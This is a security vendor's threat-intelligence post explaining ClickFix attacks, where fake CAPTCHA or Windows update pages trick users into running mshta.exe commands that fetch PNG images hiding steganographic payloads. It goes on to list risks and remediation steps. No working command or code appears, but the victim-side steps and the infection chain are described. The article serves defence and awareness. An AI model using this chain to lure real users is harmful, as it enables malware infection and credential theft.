hlk_logo

"Moving to E5 has been really good from a security point of view... Now we can get a holistic view of whatโ€™s going on, which helps us to make changes and recommendations for future plans."

IT Service Manager
Ian Harkess
Trusted by industry leaders
NHS Confederation Logo

Kickstart Your FastTrack Journey

Fill out the short form below to express your interest in our FastTrack programme, and weโ€™ll be in touch soon.

Please note: A minimum of 150 enterprise licenses is required for FastTrack eligibility.
ENQUIRY - Popup w/ Fasttrack for dark backgrounds (#28)

โ€œWe needed to find solutions to a variety of issues whilst being a complex business, operating in a 24/7 environment. Stripe OLT listened and understood immediately the challenges we faced.โ€

IT Operations Manager
Simon Darley
Trusted by industry leaders

Let's Talk

Call us on one of the numbers below, we cover the whole of the UK, so call the nearest office.

BriSTOL HQ & The South West

London & Surrounding Areas

Manchester & the North

Keep up to date with the experts

Get insights directly to your email inbox

MAIL LIST - Newsletter, Exit Intent Popup (#13)

Follow us on social

โ€œWe needed to find solutions to a variety of issues whilst being a complex business, operating in a 24/7 environment. Stripe OLT listened and understood immediately the challenges we faced.โ€

IT Operations Manager
Simon Darley
Trusted by industry leaders
NHS Confederation Logo White

Request a Call

First we need a few details.

ENQUIRY - Popup w/ Captcha for light backgrounds (#21)
Expert Intel

Beyond the click: Click Fix Meets Steganography

Published: December 4, 2025

Lorenzo Minga Profile

Expert: Lorenzo Minga

Role: Security Analyst

Specialises in: Incident Response and Threat Hunting

What you will learn:
In this report, you will learn what Click Fix and Steganography are, how they work together to create a dangerous threat vector, and the mitigations available against them.
โ€œIn the age of visibility, invisibility is the ultimate vector. ClickFix is evolving, and with simple obfuscation techniques, it transforms into a silent yet potent attack vector. The greatest trick malware ever pulled was convincing you it wasnโ€™t there.โ€

What are Click FIX & Steganography?

Click FIX

Click Fixing is a social engineering attack that manipulates users into executing malicious scripts themselves.

It begins when a user lands on a malicious or compromised website that displays a fake CAPTCHA or human verification page. This page instructs the victim to complete three steps โ€” exactly as shown in the images from sandbox analysis:

  1. Press Windows + R
  2. Press CTRL + V
  3. Press Enter

These steps cause the victim to unknowingly execute a malicious command through the Windows Run dialogue, often invoking legitimate Windows utilities (LOLBins) such as mshta.exe. This enables attackers to deliver and run malware without dropping an obvious executable.

This technique has been rising rapidly and has now evolved through its combination with steganography.

Steganography

Steganography is the practice of hiding malicious content within an ordinary, non-secret file to evade detection. Attackers commonly use Least Significant Bit (LSB) steganography to embed malicious scripts inside seemingly normal images, such as PNG files.

When a victim opens or downloads the file, the malware hidden inside it is decoded and reconstructed – often without the victim having any idea anything is happening.

Figure 2. Example of malware embedded inside a PNG using Least Significant Bit (LSB) steganography. The attacker hides code inside an innocent-looking image and sends it to the victim, who unknowingly triggers the malware when opening the file. From [blog.httpcs.com]

How does the attack work?

Recent threat activity shows Click Fix campaigns increasingly using fake Windows security update screens. These screens mimic legitimate update messages, such as:

โ€œWorking on updates. Please do not turn off your computer.
Part 3 of 3: Check security.โ€

Victims are then instructed to run a command that triggers mshta.exe, for example:

Figure 3 from BleepingComputer

This initiates the first stage of malware delivery. 

The executed command fetches an image file from the attackerโ€™s server. Although the file looks like a standard PNG, it contains an embedded malicious script using steganography. 

A loader on the victimโ€™s device decodes the hidden bytes from within the image and reconstructs a full malicious executable or payload – completing the entire infection chain. 

This method has been observed in multiple malware families, including LummaC2, and recent research shows new variants embedding encrypted .NET assemblies inside PNG files, as reported by Huntress. 

Risk & Impacts

A successful Click Fix malware attack can lead to:

Credential harvesting
Data exfiltration
C2 beaconing
Backdoor installation
Ransomware deployment

Because execution is initiated by the user via a trusted system utility, traditional defences are frequently bypassed.

Scalability

Click Fixย campaigns are expanding rapidly.

According toย InfosecurityMagazine,ย Click Fixย social engineering attacks have surged by 517% in the past six months, now becoming the second most common vector behind phishing.ย 

Exploitation

The threat relies on:

Lack of user awareness
High trust in system prompts
Abuse of legitimate Windows utilities (LOLBins)
Payloads hidden inside images to bypass detection

Together, these elements create a scalable and highly effective attack vector.

Remediation

User education

Educate users to recognise fake verification pages and understand that system updates or CAPTCHA checks never require using the Run dialogue or executing commands manually.

Email Filtering

Advanced filtering reduces the likelihood of phishing emails redirecting users to Click Fix-style malicious sites.

Web Protection

Actively monitor and block new IOC domains and prevent access to malicious URLs before users reach them.

Endpoint Detection & Response (EDR)

Ensure EDR is enabled and fully monitoring. Behavioural detection can identify misuse of LOLBins such as mshta.exe and PowerShell.

Group Policy Hardening

Disable the Run dialog for standard usersย 
Implement strict PowerShell execution policiesย 
Limit access toย LOLBinsย where operationally possibleย 

Monitoring

Continuously monitor legitimate OS processes for unusual behaviours such as:

mshta.exe initiating outbound connections
Unexpected image downloads
Decoding operations on image files
Suspicious PowerShell or .NET assembly loading

This level of telemetry is essential for detecting steganography-based loaders.

Stay ahead of emerging threats like Click Fix and Steganography.
If youโ€™d like to understand your organisationโ€™s exposure or need support strengthening your defences, our CREST-accredited SOC team is here to help. Get in touch with our experts today.

Our Sources:

  1. https://www.proofpoint.com/uk/blog/threat-insight/security-brief-clickfix-social-engineering-technique-floods-threat-landscape
  2. https://www.bleepingcomputer.com/news/security/clickfix-attack-uses-fake-windows-update-screen-to-push-malware/amp/
  3. https://www.huntress.com/blog/clickfix-malware-buried-in-images
  4. ClickFix Attacks Surge 517% in 2025 – Infosecurity Magazine